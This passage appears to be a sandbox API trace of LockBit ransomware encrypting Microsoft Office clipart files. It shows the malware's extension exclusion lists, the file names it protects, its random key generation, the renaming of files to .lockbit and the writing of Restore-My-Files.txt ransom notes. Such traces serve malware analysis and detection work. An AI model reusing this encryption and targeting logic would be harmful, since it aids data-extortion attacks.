Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0162.374] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01126_.WMF") returned=".WMF" [0162.374] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0162.374] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0162.374] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0162.374] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0162.374] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0162.374] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0162.374] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0162.374] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0162.374] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0162.374] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0162.374] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0162.374] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0162.374] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0162.374] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0162.374] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0162.374] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0162.374] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0162.374] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0162.374] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0162.374] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0162.374] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0162.374] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0162.374] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0162.374] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0162.375] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0162.375] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0162.375] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0162.375] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0162.375] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01126_.WMF.lockbit") returned 72 [0162.375] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01126_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01126_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0162.376] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0162.376] malloc (_Size=0x40068) returned 0x3e70008 [0162.376] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=2928) returned 1 [0162.376] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.377] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.377] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0162.377] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.377] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.377] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0162.377] ReadFile (in: hFile=0x2a8, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0162.383] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01126_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01126_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.383] malloc (_Size=0xa6) returned 0x1fa2ed8 [0162.383] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0162.384] free (_Block=0x1fa2ed8) [0162.384] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01126_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0162.384] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0162.384] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0162.385] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x94292d00, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x6a34aa30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x94292d00, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x16a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA01130_.WMF", cAlternateFileName="")) returned 1 [0162.385] lstrcmpiW (lpString1=".", lpString2="NA01130_.WMF") returned -1 [0162.385] lstrcmpiW (lpString1="..", lpString2="NA01130_.WMF") returned -1 [0162.385] PathFindExtensionW (pszPath="NA01130_.WMF") returned=".WMF" [0162.385] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0162.385] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0162.385] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0162.385] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0162.385] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0162.385] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0162.385] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0162.385] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0162.385] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0162.385] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0162.385] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0162.385] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0162.385] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0162.385] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0162.385] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0162.385] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0162.385] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0162.386] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0162.386] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0162.386] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0162.386] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0162.386] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0162.386] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0162.386] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0162.386] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.386] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0162.386] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0162.386] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0162.386] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0162.386] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0162.386] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0162.386] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0162.386] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0162.386] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0162.386] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0162.386] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0162.386] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0162.387] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0162.387] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0162.387] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0162.387] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0162.387] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0162.387] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.387] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0162.387] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0162.387] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0162.387] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0162.387] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA01130_.WMF") returned 1 [0162.387] lstrcmpiW (lpString1="ntldr", lpString2="NA01130_.WMF") returned 1 [0162.387] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA01130_.WMF") returned 1 [0162.387] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA01130_.WMF") returned -1 [0162.387] lstrcmpiW (lpString1="autorun.inf", lpString2="NA01130_.WMF") returned -1 [0162.387] lstrcmpiW (lpString1="thumbs.db", lpString2="NA01130_.WMF") returned 1 [0162.387] lstrcmpiW (lpString1="iconcache.db", lpString2="NA01130_.WMF") returned -1 [0162.387] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0162.387] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01130_.WMF") returned=".WMF" [0162.387] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0162.387] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0162.388] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0162.388] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0162.388] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0162.388] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0162.388] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0162.388] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0162.388] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0162.388] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0162.388] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0162.388] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0162.388] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0162.388] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0162.388] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0162.388] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0162.388] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0162.388] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0162.388] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0162.388] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0162.388] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0162.388] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0162.388] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0162.389] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0162.389] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0162.389] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0162.389] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0162.389] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0162.389] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01130_.WMF.lockbit") returned 72 [0162.389] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01130_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01130_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0162.390] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0162.390] malloc (_Size=0x40068) returned 0x3d70450 [0162.390] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=5792) returned 1 [0162.390] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.391] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.391] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0162.391] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.391] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.391] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0162.391] ReadFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0162.397] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01130_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01130_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.397] malloc (_Size=0xa6) returned 0x1fa2ed8 [0162.397] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0162.399] free (_Block=0x1fa2ed8) [0162.399] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01130_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0162.399] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0162.399] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0162.399] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22e1e00, ftCreationTime.dwHighDateTime=0x1bd4afd, ftLastAccessTime.dwLowDateTime=0x6a370b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x22e1e00, ftLastWriteTime.dwHighDateTime=0x1bd4afd, nFileSizeHigh=0x0, nFileSizeLow=0x16d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA01141_.WMF", cAlternateFileName="")) returned 1 [0162.399] lstrcmpiW (lpString1=".", lpString2="NA01141_.WMF") returned -1 [0162.399] lstrcmpiW (lpString1="..", lpString2="NA01141_.WMF") returned -1 [0162.399] PathFindExtensionW (pszPath="NA01141_.WMF") returned=".WMF" [0162.399] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0162.399] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0162.399] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0162.399] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0162.399] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0162.399] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0162.399] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0162.399] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0162.399] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0162.399] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0162.399] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0162.399] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0162.399] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0162.399] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0162.400] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0162.400] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0162.400] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0162.400] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0162.400] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0162.400] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0162.400] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0162.400] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0162.400] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0162.400] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0162.400] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.400] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0162.400] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0162.400] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0162.400] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0162.400] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0162.400] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0162.400] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0162.400] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0162.400] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0162.400] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0162.400] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0162.400] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0162.400] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0162.400] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0162.401] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0162.401] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0162.401] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0162.401] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.401] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0162.401] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0162.401] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0162.401] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0162.401] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA01141_.WMF") returned 1 [0162.401] lstrcmpiW (lpString1="ntldr", lpString2="NA01141_.WMF") returned 1 [0162.401] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA01141_.WMF") returned 1 [0162.401] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA01141_.WMF") returned -1 [0162.401] lstrcmpiW (lpString1="autorun.inf", lpString2="NA01141_.WMF") returned -1 [0162.401] lstrcmpiW (lpString1="thumbs.db", lpString2="NA01141_.WMF") returned 1 [0162.401] lstrcmpiW (lpString1="iconcache.db", lpString2="NA01141_.WMF") returned -1 [0162.401] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0162.401] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01141_.WMF") returned=".WMF" [0162.401] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0162.401] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0162.401] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0162.401] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0162.401] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0162.401] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0162.401] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0162.402] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0162.402] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0162.402] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0162.402] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0162.402] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0162.402] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0162.402] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0162.402] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0162.402] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0162.402] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0162.402] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0162.402] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0162.402] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0162.402] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0162.402] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0162.402] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0162.402] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0162.402] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0162.402] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0162.402] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0162.402] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0162.402] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01141_.WMF.lockbit") returned 72 [0162.403] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01141_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01141_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0162.404] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0162.404] malloc (_Size=0x40068) returned 0x3df0008 [0162.404] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5848) returned 1 [0162.404] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.404] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.404] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0162.404] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.405] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.405] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0162.405] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0162.410] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01141_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01141_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.410] malloc (_Size=0xa6) returned 0x1fa2ed8 [0162.410] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0162.411] free (_Block=0x1fa2ed8) [0162.411] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01141_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0162.411] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0162.411] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0162.411] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc383d00, ftCreationTime.dwHighDateTime=0x1bd4afc, ftLastAccessTime.dwLowDateTime=0x594d2670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfc383d00, ftLastWriteTime.dwHighDateTime=0x1bd4afc, nFileSizeHigh=0x0, nFileSizeLow=0x1f38, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA01148_.WMF", cAlternateFileName="")) returned 1 [0162.411] lstrcmpiW (lpString1=".", lpString2="NA01148_.WMF") returned -1 [0162.411] lstrcmpiW (lpString1="..", lpString2="NA01148_.WMF") returned -1 [0162.411] PathFindExtensionW (pszPath="NA01148_.WMF") returned=".WMF" [0162.411] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 